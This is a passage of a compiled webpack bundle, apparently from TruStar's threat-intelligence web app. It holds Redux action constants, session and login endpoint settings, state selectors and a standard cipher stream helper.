/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "H", function() { return SAVE_NOTE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "G", function() { return SAVE_NOTE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "R", function() { return UPDATE_NOTE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "T", function() { return UPDATE_NOTE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "S", function() { return UPDATE_NOTE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return DELETE_NOTE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return DELETE_NOTE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return DELETE_NOTE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "x", function() { return PROCESS_ANNOTATIONS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "w", function() { return PROCESS_ANNOTATIONS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "I", function() { return SET_ACTIVE_NOTE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "t", function() { return HIGHLIGHT_NODE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "D", function() { return RESET_HIGHLIGHT_NODE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "s", function() { return GO_TO_BREADCRUMB; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ADD_BREADCRUMB; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "C", function() { return RESET_BREADCRUMBS; });
var prefix = function prefix(str) {
  return 'station/constellation/' + str;
};

var FETCH = prefix('FETCH');
var FETCH_SUCCESS = prefix('FETCH_SUCCESS');
var FETCH_FAILURE = prefix('FETCH_FAILURE');

var FETCH_EXPLOSION = prefix('FETCH_EXPLOSION');
var FETCH_EXPLOSION_SUCCESS = prefix('FETCH_EXPLOSION_SUCCESS');
var FETCH_EXPLOSION_FAILURE = prefix('FETCH_EXPLOSION_FAILURE');

var CLEAR_EXPLOSION = prefix('CLEAR_EXPLOSION');

var CLEAR = prefix('CLEAR');

var TOGGLE_NODE = prefix('TOGGLE_NODE');
var NODE_CLICKED = prefix('NODE_CLICKED');
var REPLACE_SELECTION = prefix('REPLACE_SELECTION');
var DELETE_NODES = prefix('DELETE_NODES');
var DELETE_NODES_SUCCESS = prefix('DELETE_NODES_SUCCESS');

var SET_FILTERS = prefix('SET_FILTERS');
var SET_FILTERS_SUCCESS = prefix('SET_FILTERS_SUCCESS');
var SET_OPTIONS = prefix('SET_OPTIONS');
var SET_HOVERED_NODE_ID = prefix('SET_HOVERED_NODE_ID');
var SET_ROOT_NODE_ID = prefix('SET_ROOT_NODE_ID');

var SET_MODAL_OPTIONS = prefix('SET_MODAL_OPTIONS');

var UPDATE_TIME_RANGE = prefix('UPDATE_TIME_RANGE');
var CACHE_GRAPH_SIMULATION = prefix('CACHE_GRAPH_SIMULATION');
var CACHE_GRAPH_SIMULATION_SUCCESS = prefix('CACHE_GRAPH_SIMULATION_SUCCESS');
var INVALIDATE_GRAPH_CACHE = prefix('INVALIDATE_GRAPH_CACHE');

var UNDO = prefix('UNDO');
var REDO = prefix('REDO');
var RESET = prefix('RESET');
var UNDO_SUCCESS = prefix('UNDO_SUCCESS');
var REDO_SUCCESS = prefix('REDO_SUCCESS');
var RESET_SUCCESS = prefix('RESET_SUCCESS');

var CLOSE_TIME_RANGE_EXPLANATION = prefix('CLOSE_TIME_RANGE_EXPLANATION');
var EXPORT_INDICATORS = prefix('EXPORT_INDICATORS');

var SAVE_NOTE = prefix('SAVE_NOTE');
var SAVE_NOTE_SUCCESS = prefix('SAVE_NOTE_SUCCESS');
var SAVE_NOTE_FAILURE = prefix('SAVE_NOTE_FAILURE');

var UPDATE_NOTE = prefix('UPDATE_NOTE');
var UPDATE_NOTE_SUCCESS = prefix('UPDATE_NOTE_SUCCESS');
var UPDATE_NOTE_FAILURE = prefix('UPDATE_NOTE_FAILURE');

var DELETE_NOTE = prefix('DELETE_NOTE');
var DELETE_NOTE_SUCCESS = prefix('DELETE_NOTE_SUCCESS');
var DELETE_NOTE_FAILURE = prefix('DELETE_NOTE_FAILURE');

var PROCESS_ANNOTATIONS_SUCCESS = prefix('PROCESS_ANNOTATIONS_SUCCESS');
var PROCESS_ANNOTATIONS_FAILURE = prefix('PROCESS_ANNOTATIONS_FAILURE');

var SET_ACTIVE_NOTE = prefix('SET_ACTIVE_NOTE');

var HIGHLIGHT_NODE = prefix('HIGHLIGHT_NODE');
var RESET_HIGHLIGHT_NODE = prefix('RESET_HIGHLIGHT_NODE');

var GO_TO_BREADCRUMB = prefix('GO_TO_BREADCRUMB');
var ADD_BREADCRUMB = prefix('ADD_BREADCRUMB');
var RESET_BREADCRUMBS = prefix('RESET_BREADCRUMBS');

/***/ }),
/* 144 */,
/* 145 */,
/* 146 */,
/* 147 */,
/* 148 */,
/* 149 */,
/* 150 */,
/* 151 */,
/* 152 */,
/* 153 */,
/* 154 */,
/* 155 */,
/* 156 */,
/* 157 */,
/* 158 */,
/* 159 */,
/* 160 */,
/* 161 */,
/* 162 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Config", function() { return Config; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__themeColors__ = __webpack_require__(1476);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "ThemeColors", function() { return __WEBPACK_IMPORTED_MODULE_0__themeColors__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__common_colorNames__ = __webpack_require__(207);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "ColorNames", function() { return __WEBPACK_IMPORTED_MODULE_1__common_colorNames__; });






var Config = {
  name: 'Default Theme',
  className: 'trustar'
};

/***/ }),
/* 163 */,
/* 164 */,
/* 165 */,
/* 166 */,
/* 167 */,
/* 168 */,
/* 169 */,
/* 170 */,
/* 171 */,
/* 172 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "KEEPALIVE_ENDPOINT", function() { return KEEPALIVE_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGIN_ENDPOINT", function() { return LOGIN_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGIN_ENDPOINT_AUTHPATH", function() { return LOGIN_ENDPOINT_AUTHPATH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGOUT_ENDPOINT", function() { return LOGOUT_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGOUT_ENDPOINT_AUTHPATH", function() { return LOGOUT_ENDPOINT_AUTHPATH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SIGN_EULA_ENDPOINT", function() { return SIGN_EULA_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "MFA_VERIFY_RESPONSE_ENDPOINT", function() { return MFA_VERIFY_RESPONSE_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CHANGE_PASSWORD_ENDPOINT", function() { return CHANGE_PASSWORD_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FORGOT_PASSWORD_ENDPOINT", function() { return FORGOT_PASSWORD_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WARNING", function() { return WARNING; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGOUT", function() { return LOGOUT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SERVER_SESSION_TIME", function() { return SERVER_SESSION_TIME; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGIN_TIMEOUT_MS", function() { return LOGIN_TIMEOUT_MS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ACTIVITY_LOCAL_STORAGE_POLL_FREQUENCY_MS", function() { return ACTIVITY_LOCAL_STORAGE_POLL_FREQUENCY_MS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "STORED_USERNAME_LOCALSTORAGE_KEY", function() { return STORED_USERNAME_LOCALSTORAGE_KEY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "COMING_FROM_APP", function() { return COMING_FROM_APP; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "IS_LOGGED_IN_LOCALSTORAGE_KEY", function() { return IS_LOGGED_IN_LOCALSTORAGE_KEY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LAST_USER_ACTION_LOCALSTORAGE_KEY", function() { return LAST_USER_ACTION_LOCALSTORAGE_KEY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LAST_VIEWED_SEARCH", function() { return LAST_VIEWED_SEARCH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LAST_VIEWED_REPORTS", function() { return LAST_VIEWED_REPORTS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LAST_VIEWED_INDICATORS", function() { return LAST_VIEWED_INDICATORS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TRUSTAR_SUPPORT_PAGE", function() { return TRUSTAR_SUPPORT_PAGE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ROUTES_THAT_SHOULD_NOT_HAVE_SUBMIT_BUTTON", function() { return ROUTES_THAT_SHOULD_NOT_HAVE_SUBMIT_BUTTON; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ms__ = __webpack_require__(216);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ms___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_ms__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);



var KEEPALIVE_ENDPOINT = '/tools/session';

var LOGIN_ENDPOINT = '/login';
var LOGIN_ENDPOINT_AUTHPATH = '/auth/login';

var LOGOUT_ENDPOINT = '/logout'; // Vestigial
var LOGOUT_ENDPOINT_AUTHPATH = '/auth/logout';

var SIGN_EULA_ENDPOINT = '/services/users/eula';
var MFA_VERIFY_RESPONSE_ENDPOINT = '/services/auth/mfa';
var CHANGE_PASSWORD_ENDPOINT = '/services/password/update';
var FORGOT_PASSWORD_ENDPOINT = '/services/password/forgot';

var WARNING = 'warning';
var LOGOUT = 'logOut';

var SERVER_SESSION_TIME = __WEBPACK_IMPORTED_MODULE_0_ms___default()('30m');
var LOGIN_TIMEOUT_MS = __WEBPACK_IMPORTED_MODULE_0_ms___default()('15s');
var ACTIVITY_LOCAL_STORAGE_POLL_FREQUENCY_MS = __WEBPACK_IMPORTED_MODULE_0_ms___default()('15s');

var STORED_USERNAME_LOCALSTORAGE_KEY = 'TS_STORED_USERNAME';
var COMING_FROM_APP = 'TS_CFA';
var IS_LOGGED_IN_LOCALSTORAGE_KEY = 'TS_IS_LOGGED_IN';
var LAST_USER_ACTION_LOCALSTORAGE_KEY = 'LUA_TS';

var LAST_VIEWED_SEARCH = 'search';
var LAST_VIEWED_REPORTS = 'reports';
var LAST_VIEWED_INDICATORS = 'indicators';

var TRUSTAR_SUPPORT_PAGE = 'https://trustar.atlassian.net/servicedesk/customer/portal/1/group/1/create/1';

var ROUTES_THAT_SHOULD_NOT_HAVE_SUBMIT_BUTTON = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])(['create', 'review', 'update']);

/***/ }),
/* 173 */,
/* 174 */,
/* 175 */,
/* 176 */,
/* 177 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export SAVE */
/* unused harmony export SAVE_SUCCESS */
/* unused harmony export SAVE_FAILURE */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return SAVE_ENCLAVE_ICON; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return SAVE_ENCLAVE_ICON_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return SAVE_ENCLAVE_ICON_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return SAVE_TEMPLATE_ICON; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return SAVE_TEMPLATE_ICON_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return SAVE_TEMPLATE_ICON_FAILURE; });
var prefix = function prefix(str) {
  return 'station/icon/' + str;
};

var SAVE = prefix('SAVE');
var SAVE_SUCCESS = prefix('SAVE_SUCCESS');
var SAVE_FAILURE = prefix('SAVE_FAILURE');

var SAVE_ENCLAVE_ICON = prefix('SAVE_ENCLAVE_ICON');
var SAVE_ENCLAVE_ICON_SUCCESS = prefix('SAVE_ENCLAVE_ICON_SUCCESS');
var SAVE_ENCLAVE_ICON_FAILURE = prefix('SAVE_ENCLAVE_ICON_FAILURE');

var SAVE_TEMPLATE_ICON = prefix('SAVE_TEMPLATE_ICON');
var SAVE_TEMPLATE_ICON_SUCCESS = prefix('SAVE_TEMPLATE_ICON_SUCCESS');
var SAVE_TEMPLATE_ICON_FAILURE = prefix('SAVE_TEMPLATE_ICON_FAILURE');

/***/ }),
/* 178 */,
/* 179 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(569);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(182);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(134);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actionTypes", function() { return __WEBPACK_IMPORTED_MODULE_2__action_types_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__constants_js__ = __webpack_require__(172);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "constants", function() { return __WEBPACK_IMPORTED_MODULE_3__constants_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__stores_js__ = __webpack_require__(1294);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_4__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__epics_js__ = __webpack_require__(2893);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_5__epics_js__["a"]; });












/***/ }),
/* 180 */,
/* 181 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__types_js__ = __webpack_require__(1269);
/* unused harmony namespace reexport */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__constants_js__ = __webpack_require__(302);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return __WEBPACK_IMPORTED_MODULE_1__constants_js__["b"]; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return __WEBPACK_IMPORTED_MODULE_1__constants_js__["d"]; });
/* unused harmony reexport constants */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__actions_js__ = __webpack_require__(2749);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__actions_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2__actions_js__);
/* unused harmony reexport actions */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__getters_js__ = __webpack_require__(2750);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "d", function() { return __WEBPACK_IMPORTED_MODULE_3__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__stores_js__ = __webpack_require__(2751);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_4__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__epics_js__ = __webpack_require__(2752);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_5__epics_js__["a"]; });












/***/ }),
/* 182 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "intendedPath", function() { return intendedPath; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "timeoutWarning", function() { return timeoutWarning; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "options", function() { return options; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isLoggedIn", function() { return isLoggedIn; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "mfa", function() { return mfa; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "passwordValidation", function() { return passwordValidation; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "createPasswordAttempt", function() { return createPasswordAttempt; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "userCredentials", function() { return userCredentials; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "statusMessage", function() { return statusMessage; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loadingLogin", function() { return loadingLogin; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "didAcceptTerms", function() { return didAcceptTerms; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "confirmation", function() { return confirmation; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "theme", function() { return theme; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "visitedDashboard", function() { return visitedDashboard; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "visitedConstellation", function() { return visitedConstellation; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "visitedExplore", function() { return visitedExplore; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "routeHistory", function() { return routeHistory; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "clipboardCopied", function() { return clipboardCopied; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "lastRoute", function() { return lastRoute; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "userLastViewed", function() { return userLastViewed; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "serverTime", function() { return serverTime; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "logoutTime", function() { return logoutTime; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "warningTime", function() { return warningTime; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getHeaderPalette", function() { return getHeaderPalette; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getRegularPallette", function() { return getRegularPallette; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ms__ = __webpack_require__(216);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ms___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_ms__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__profile_getters__ = __webpack_require__(142);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__constants__ = __webpack_require__(172);









var intendedPath = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'intendedPath']);

var loading = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'loading']);

var serverTimeout = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'serverTimeout']);

var timeoutWarning = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'timeoutWarning']);

var options = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'options']);

var isLoggedIn = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'isLoggedIn']);

var mfa = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'mfa']);

var passwordValidation = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'passwordValidation']);

var createPasswordAttempt = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'createPasswordAttempt']);

var userCredentials = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'userCredentials']);

var statusMessage = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'statusMessage']);

var loadingLogin = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'loadingLogin']);

var didAcceptTerms = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'didAcceptTerms']);

var confirmation = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'confirmation']);

var theme = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'options', 'theme']);

var visitedDashboard = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'activity', 'visitedDashboard']);

var visitedConstellation = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'activity', 'visitedConstellation']);

var visitedExplore = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'activity', 'visitedExplore']);

var routeHistory = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'routeHistory']);

var clipboardCopied = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["getterFromKeyPath"])(['app', 'clipboardCopied']);

/* Get last visited route (-2 => 1 before current = 'last' visited route) */
var lastRoute = Object(__WEBPACK_IMPORTED_MODULE_3_reselect__["createSelector"])(routeHistory, function (routes) {
  return routes.get(-2, '');
});

/*
 * Determine if the user last viewed search, reports, or indicators, in the Explore view, in order to
 * correctly paginate graph.
 */

var userLastViewed = Object(__WEBPACK_IMPORTED_MODULE_3_reselect__["createSelector"])(routeHistory, function (routes) {
  return routes.reverse().reduce(function (last, route) {
    if (last) return last;
    if (route.includes('browse/search')) return __WEBPACK_IMPORTED_MODULE_5__constants__["LAST_VIEWED_SEARCH"];
    if (route.includes('browse/reports')) return __WEBPACK_IMPORTED_MODULE_5__constants__["LAST_VIEWED_REPORTS"];
    if (route.includes('browse/iocs')) return __WEBPACK_IMPORTED_MODULE_5__constants__["LAST_VIEWED_INDICATORS"];
    return null;
  }, null);
});

var serverTime = Object(__WEBPACK_IMPORTED_MODULE_3_reselect__["createSelector"])(serverTimeout, function (time) {
  return Math.max(time - __WEBPACK_IMPORTED_MODULE_0_ms___default()('1m'), __WEBPACK_IMPORTED_MODULE_0_ms___default()('3m'));
});

var logoutTime = Object(__WEBPACK_IMPORTED_MODULE_3_reselect__["createSelector"])(serverTimeout, function (time) {
  return Math.max(time - __WEBPACK_IMPORTED_MODULE_0_ms___default()('2m'), __WEBPACK_IMPORTED_MODULE_0_ms___default()('2m'));
});

var warningTime = Object(__WEBPACK_IMPORTED_MODULE_3_reselect__["createSelector"])(serverTimeout, function (time) {
  return Math.max(time - __WEBPACK_IMPORTED_MODULE_0_ms___default()('3m'), __WEBPACK_IMPORTED_MODULE_0_ms___default()('1m'));
});

// Color palette for theme dependent colors for the App Header
var getHeaderPalette = Object(__WEBPACK_IMPORTED_MODULE_3_reselect__["createSelector"])([theme, __WEBPACK_IMPORTED_MODULE_4__profile_getters__["adminRole"]], function (theme, adminRole) {
  return {
    logoFill: theme === 'dark' ? 'white' : '#3568D5',
    iconFill: theme === 'dark' ? 'white' : '#979BA6'
  };
});

// Color palette for theme dependent colors for anything else
var getRegularPallette = Object(__WEBPACK_IMPORTED_MODULE_3_reselect__["createSelector"])(theme, function (theme) {
  return {
    logoFill: 'white',
    iconFill: 'black'
  };
});

/***/ }),
/* 183 */,
/* 184 */,
/* 185 */,
/* 186 */,
/* 187 */,
/* 188 */,
/* 189 */,
/* 190 */,
/* 191 */,
/* 192 */,
/* 193 */,
/* 194 */,
/* 195 */,
/* 196 */,
/* 197 */,
/* 198 */,
/* 199 */,
/* 200 */,
/* 201 */
/***/ (function(module, exports, __webpack_require__) {

var Buffer = __webpack_require__(41).Buffer
var Transform = __webpack_require__(685).Transform
var StringDecoder = __webpack_require__(487).StringDecoder
var inherits = __webpack_require__(25)

function CipherBase (hashMode) {
  Transform.call(this)
  this.hashMode = typeof hashMode === 'string'
  if (this.hashMode) {
    this[hashMode] = this._finalOrDigest
  } else {
    this.final = this._finalOrDigest
  }
  if (this._final) {
    this.__final = this._final
    this._final = null
  }
  this._decoder = null
  this._encoding = null
}
inherits(CipherBase, Transform)

CipherBase.prototype.update = function (data, inputEnc, outputEnc) {
  if (typeof data === 'string') {
    data = Buffer.from(data, inputEnc)
  }

  var outData = this._update(data)
  if (this.hashMode) return this

  if (outputEnc) {
    outData = this._toString(outData, outputEnc)
  }

  return outData
}

CipherBase.prototype.setAutoPadding = function () {}
CipherBase.prototype.getAuthTag = function () {
  throw new Error('trying to get auth tag in unsupported state')
}

CipherBase.prototype.setAuthTag = function () {
  throw new Error('trying to set auth tag in unsupported state')
}

CipherBase.prototype.setAAD = function () {
  throw new Error('trying to set aad in unsupported state')
}

CipherBase.prototype._transform = function (data, _, next) {
  var err
  try {
    if (this.hashMode) {
      this._update(data)
    } else {
      this.push(this._update(data))
    }
  } catch (e) {
    err = e
  } finally {
    next(err)
  }
}
CipherBase.prototype._flush = function (done) {
  var err
  try {
    this.push(this.__final())
  } catch (e) {
    err = e
  }

  done(err)
}
CipherBase.prototype._finalOrDigest = function (outputEnc) {
  var outData = this.__final() || Buffer.alloc(0)
  if (outputEnc) {
    outData = this._toString(outData, outputEnc, true)
  }
  return outData
}

CipherBase.prototype._toString = function (value, enc, fin) {
  if (!this._decoder) {
    this._decoder = new StringDecoder(enc)
    this._encoding = enc
  }

  if (this._encoding !== enc) throw new Error('can\'t switch encodings')

  var out = this._decoder.write(value)
  if (fin) {
    out += this._decoder.end()
  }

  return out
}

module.exports = CipherBase


/***/ }),
/* 202 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__apiKey__ = __webpack_require__(2754);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_0__apiKey__["b"]; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_0__apiKey__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__attributes__ = __webpack_require__(2755);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return __WEBPACK_IMPORTED_MODULE_1__attributes__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__event__ = __webpack_require__(2756);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return __WEBPACK_IMPORTED_MODULE_2__event__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__eventValue__ = __webpack_require__(2757);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return __WEBPACK_IMPORTED_MODULE_3__eventValue__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__eventProperties__ = __webpack_require__(2758);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return __WEBPACK_IMPORTED_MODULE_4__eventProperties__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__key__ = __webpack_require__(2759);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return __WEBPACK_IMPORTED_MODULE_5__key__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__split__ = __webpack_require__(1274);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return __WEBPACK_IMPORTED_MODULE_6__split__["a"]; });
